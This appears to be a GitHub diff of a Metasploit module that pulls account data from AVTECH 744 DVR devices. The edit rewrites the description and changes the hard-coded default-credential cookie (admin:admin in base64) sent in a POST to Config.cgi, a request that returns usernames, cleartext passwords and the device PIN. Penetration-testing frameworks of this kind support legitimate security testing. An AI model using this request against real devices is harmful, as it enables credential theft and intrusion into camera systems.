File tree Expand file tree Collapse file tree 1 file changed +4
-4
lines changed Expand file tree Collapse file tree 1 file changed +4
-4
lines changed Original file line number Diff line number Diff line change @@ -9,9 +9,9 @@ def initialize(info = {})
9
9
super ( update_info ( info ,
10
10
'Name' => 'AVTECH 744 DVR Account Information Retrieval' ,
11
11
'Description' => %q{
12
- This module will extract the account information from the DVR,
13
- including all user's usernames and cleartext passwords plus
14
- the device PIN, along with a few other miscellaneous details.
12
+ This module will extract the accounts information from the AVTECH 744 DVR devices ,
13
+ including all the usernames and cleartext passwords plus the device PIN, along with
14
+ a few other miscellaneous details.
15
15
} ,
16
16
'Author' => [ 'nstarke' ] ,
17
17
'License' => MSF_LICENSE
@@ -23,7 +23,7 @@ def run
23
23
res = send_request_cgi ( {
24
24
'method' => 'POST' ,
25
25
'uri' => '/cgi-bin/user/Config.cgi' ,
26
- 'cookie' => ' SSID=YWRtaW46YWRtaW4=;' ,
26
+ 'cookie' => " SSID=#{ Rex :: Text . encode_base64 ( 'admin:admin' ) } ;" ,
27
27
'vars_post' => {
28
28
'action' => 'get' ,
29
29
'category' => 'Account.*'
You can’t perform that action at this time.
0 commit comments